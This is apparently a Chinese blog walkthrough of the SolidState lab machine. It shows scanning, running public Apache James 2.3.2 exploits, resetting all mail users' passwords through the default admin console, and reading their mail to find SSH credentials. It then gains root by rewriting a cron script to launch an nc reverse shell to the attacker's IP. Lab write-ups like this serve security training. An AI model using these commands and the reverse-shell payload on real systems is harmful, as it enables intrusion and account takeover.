一、主机发现+信息收集
nmap -sn 192.168.25.0/24
端口扫描
nmap --min-rate 10000 -p- $ip
PORT STATE SERVICE 22/tcp open ssh 25/tcp open smtp 80/tcp open http 110/tcp open pop3 119/tcp open nntp 4555/tcp open rsip
服务信息收集
nmap -sT -sV -O -p22,25,80,110,119,4555 $ip
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0) 25/tcp open smtp JAMES smtpd 2.3.2 80/tcp open http Apache httpd 2.4.25 ((Debian)) 110/tcp open pop3 JAMES pop3d 2.3.2 119/tcp open nntp JAMES nntpd (posting ok) 4555/tcp open james-admin JAMES Remote Admin 2.3.2 MAC Address: 00:0C:29:CB:22:67 (VMware) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
脚本扫描
nmap --script=vuln -p22,25,80,110,119,4555 $ip
PORT STATE SERVICE 22/tcp open ssh 25/tcp open smtp | smtp-vuln-cve2010-4344: |_ The SMTP server is not Exim: NOT VULNERABLE 80/tcp open http |_http-dombased-xss: Couldn't find any DOM based XSS. | http-sql-injection: | Possible sqli for queries: | http://192.168.25.141:80/assets/js/?C=S%3BO%3DA%27%20OR%20sqlspider | http://192.168.25.141:80/assets/js/?C=M%3BO%3DA%27%20OR%20sqlspider | http://192.168.25.141:80/assets/js/?C=N%3BO%3DD%27%20OR%20sqlspider | http://192.168.25.141:80/assets/js/?C=D%3BO%3DA%27%20OR%20sqlspider | http://192.168.25.141:80/assets/?C=D%3BO%3DA%27%20OR%20sqlspider | http://192.168.25.141:80/assets/?C=N%3BO%3DD%27%20OR%20sqlspider | http://192.168.25.141:80/assets/?C=S%3BO%3DA%27%20OR%20sqlspider | http://192.168.25.141:80/assets/?C=M%3BO%3DA%27%20OR%20sqlspider | http://192.168.25.141:80/assets/js/?C=N%3BO%3DA%27%20OR%20sqlspider | http://192.168.25.141:80/assets/js/?C=D%3BO%3DA%27%20OR%20sqlspider | http://192.168.25.141:80/assets/js/?C=M%3BO%3DA%27%20OR%20sqlspider | http://192.168.25.141:80/assets/js/?C=S%3BO%3DD%27%20OR%20sqlspider | http://192.168.25.141:80/assets/js/ie/?C=M%3BO%3DA%27%20OR%20sqlspider | http://192.168.25.141:80/assets/js/ie/?C=S%3BO%3DA%27%20OR%20sqlspider | http://192.168.25.141:80/assets/js/ie/?C=D%3BO%3DA%27%20OR%20sqlspider | http://192.168.25.141:80/assets/js/ie/?C=N%3BO%3DD%27%20OR%20sqlspider | http://192.168.25.141:80/assets/js/?C=M%3BO%3DD%27%20OR%20sqlspider | http://192.168.25.141:80/assets/js/?C=N%3BO%3DA%27%20OR%20sqlspider | http://192.168.25.141:80/assets/js/?C=D%3BO%3DA%27%20OR%20sqlspider |_ http://192.168.25.141:80/assets/js/?C=S%3BO%3DA%27%20OR%20sqlspider |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. | http-csrf: | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.25.141 | Found the following possible CSRF vulnerabilities: | | Path: http://192.168.25.141:80/ | Form id: name | Form action: # | | Path: http://192.168.25.141:80/index.html | Form id: name | Form action: # | | Path: http://192.168.25.141:80/about.html | Form id: name | Form action: # | | Path: http://192.168.25.141:80/services.html | Form id: name |_ Form action: # | http-enum: | /README.txt: Interesting, a readme. |_ /images/: Potentially interesting directory w/ listing on 'apache/2.4.25 (debian)' 110/tcp open pop3 119/tcp open nntp 4555/tcp open rsip MAC Address: 00:0C:29:CB:22:67 (VMware)
看到信息查到80端口的web 服务器可能存在sql注入
二、开始渗透
80端口(突破面大,很重要,先看)
http://192.168.25.141:80/assets/?C=M%3BO%3DA%27%20OR%20sqlspider
不是sql注入,是一个文件泄露,里面有js文件
那就还回归到原始路径
先扫一下网站目录
gobuster dir -u http://192.168.25.141/ --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
/images (Status: 301) [Size: 317] [--> http://192.168.25.141/images/] /assets (Status: 301) [Size: 317] [--> http://192.168.25.141/assets/] /server-status (Status: 403) [Size: 302]
再用另一个工具扫一遍
services.html about.html
http://192.168.25.141/services.html
发现web服务都是些展示页面没有什么功能可注入点,既然如此我们就尝试其他服务
EXP利用
根据信息收集我们发现服务版本中出现最多的信息就是JAMES
searchsploit JAMES
存在几个EXP,版本2.3.2,一切都是这么巧
我们重点关注RCE,也就是中间两个,将这两个都下载下来
searchsploit -m 35513
searchsploit -m 50347
改一下名字,方便继续操作使用
mv 35513.py 1.py
mv 50347.py 2.py
先看2.py
需要python3环境,我们这里直接使用python 就行
python 2.py 192.168.25.141 192.168.25.132 4444
这里需要对面有用户登录我们才可以触发这块,首先就是想着对面有无计划定时任务
等了一会儿发现啥都没。。
那我们看一下这个EXP吧
这里是使用了 James Remote Administration Tool的默认用户root,root,既然执行成功,那这个用户肯定是没问题的我们去登录一下
nc 192.168.25.141 4555
直接使用nc登录
登录成功
进入smtp协议命令
smtp协议命令
help
help display this help listusers display existing accounts countusers display the number of existing accounts adduser [username] [password] add a new user verify [username] verify if specified user exist deluser [username] delete existing user setpassword [username] [password] sets a user's password setalias [user] [alias] locally forwards all email for 'user' to 'alias' showalias [username] shows a user's current email alias unsetalias [user] unsets an alias for 'user' setforwarding [username] [emailaddress] forwards a user's email to another email address showforwarding [username] shows a user's current email forwarding unsetforwarding [username] removes a forward user [repositoryname] change to another user repository shutdown kills the current JVM (convenient when James is run as a daemon) quit close connection
我们都尝试输入一下
listusers 用户列表
Existing accounts 6 user: james user: ../../../../../../../../etc/bash_completion.d user: thomas user: john user: mindy user: mailadmin
addusers [user] [password] 添加用户
addusers mini mini
adduser mini mini User mini added listusers Existing accounts 7 user: james user: ../../../../../../../../etc/bash_completion.d user: thomas user: john user: mindy user: mailadmin user: mini
setpassword [user] [password] 修改密码
我们这里直接都修改了,后面到pop3去挨个看
setpassword james root Password for james reset setpassword ../../../../../../../../etc/bash_completion.d root Password for ../../../../../../../../etc/bash_completion.d reset setpassword thomas root Password for thomas reset setpassword john root Password for john reset setpassword mindy root Password for mindy reset setpassword mailadmin root Password for mailadmin reset
这里所有用户的密码都修改为了root
quit 退出
连接POP3服务并查看敏感信息
telnet 192.168.25.141 110 使用telnet命令连接POP3服务,并登录
user james
pass root
登入进入使用list 进行查看邮件,没有退出,然后就一个一个试
../../../../../../../../etc/bash_completion.d 用户发现邮件
使用 retr命令读取
retr 1
这是我们利用EXP创建的用户而构建的
thomas 用户 无
john 用户 1份 无价值信息
mindy 用户
Dear Mindy, Welcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you. We are looking forward to you joining our team and your success at Solid State Security. Respectfully, James
Dear Mindy, Here are your ssh credentials to access the system. Remember to reset your password after your first login. Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path. username: mindy pass: P@55W0rd1!2@ Respectfully, James
发现用户和密码
mindy P@55W0rd1!2@
mailadmin 用户无
三、获得初始权限
得到密码直接去尝试ssh服务
这里我们登录发现出错了,想到应该是上面的EXP触发了(有人登录就会触发)
返回我们的监听终端(nc -nvlp 4444)没开的记得开一下
四、提权
whoami
id
ip addr
echo $SHELL
echo $PATH
uname -a
ls
cat user.txt
914d0a4ebc1777889b5b89a23f556fd75
是一串加密内容
使用工具辨别一下这串密码是什么加密 无
hash-identifier 914d0a4ebc1777889b5b89a23f556fd75
那就使用命令找一下密码痕迹
grep -R -i pass /home/* 2>/dev/null
无
再看一下特权程序
find / -perm -u=s -ls 2>/dev/null
查看特权程序,发现不少可以提权的命令
在GTFOBins搜索提权命令
如 mount
sudo mount -o bind /bin/sh /bin/mount
sudo mount
但是我们没有sudo命令就很难受
用户价值文件探寻
ls -la /home/
find /home/james/ -type f -ls 2>/dev/null
cron计划任务
find /var/spool/cron/ -type f -ls 2>/dev/null
find /etc/cron -type f -ls 2>/dev/null
没有可write的计划任务
find / -perm -0006 -type f ! -path "/proc/*" 2>/dev/null
从根目录 / 开始查找文件系统中所有普通文件,这些文件的权限至少包含读写权限(即 0006),并且排除 /proc/ 目录下的文件
-
find:是一个用于在文件系统中查找文件和目录的命令。 -
/:表示从根目录开始查找,这是查找的起始位置。 -
-perm -0006-
-perm用于根据文件权限进行查找。 -
-0006表示查找权限中包含 0006 权限的文件,这里的权限是用八进制表示的。数字 6 对应的权限是rw-,即文件具有读写权限。-符号表示要查找的文件的权限至少包含这些权限。也就是说,文件的权限可能比 0006 多,但必须至少包含读写权限。
-
-
-type f:表示只查找文件类型为普通文件的文件,而不查找目录、符号链接等其他类型的文件。! -path "/proc/*"-
!表示取反操作。 -
-path "/proc/*"是对文件路径的匹配,该条件会排除/proc/目录下的文件。/proc/是一个特殊的文件系统,其中包含了许多系统进程的信息,通常不是用户需要查找的文件。
-
发现/opt/tmp.py文件
这是一个清理临时文件的定时脚本,我们看一下权限
OK,找到了
os.system('nc -nv 192.168.25.132 4445 -e /bin/bash &')
替换执行任务,反弹shell命令
这里是反弹shell的交互模式,我们这里使用sed流文本编辑器
sed -i 's/\(rm -r \/tmp\/*\)/\(nc -nv 192.168.25.132 4445 -e \/bin\/bash &\)/g' tmp.py
-i 直接在文本中编辑保存
s 表示替换操作
g 表示全局替换,替换所有出现”os.system('rm -r /tmp/* ')“的文本
()括号前加一个 \ 号表示转义,否则报错
当前目录下sed还没有权限进行执行
那就只能vi了,我们换一下连接模式用ssh连一下
我们没开监听所以执行EXP报错,并且直接连上了ssh
好好好,在ssh下的我们什么命令都执行不了的
还是回去刚刚的监听搞个pty环境
python -c 'import pty; pty.spawn("/bin/bash")'
可能有点怪这个编辑模式,我们先把这个文件文本留下来,然后清空
将修改后的文本再粘贴上去
#!/usr/bin/env python
import os
import sys
try:
os.system('nc -nv 192.168.25.132 4445 -e /bin/bash &')
except:
sys.exit()
先清空 echo > tmp.py
cat 一下看看是否成功清空
然后vi tmp.py
输入 i 进入编写模式,然后粘贴改后内容
emm,差不多这个样子好怪,但是内容没问题
我们开一下监听并且等待连接
nc -nvlp 4555
成功连接,且是root权限
非特殊说明,本博所有文章均为博主原创。
如若转载,请注明出处:https://www.oneblanks.xyz/solidstate%e9%9d%b6%e6%9c%ba%e8%ae%ad%e7%bb%83/
共有 0 条评论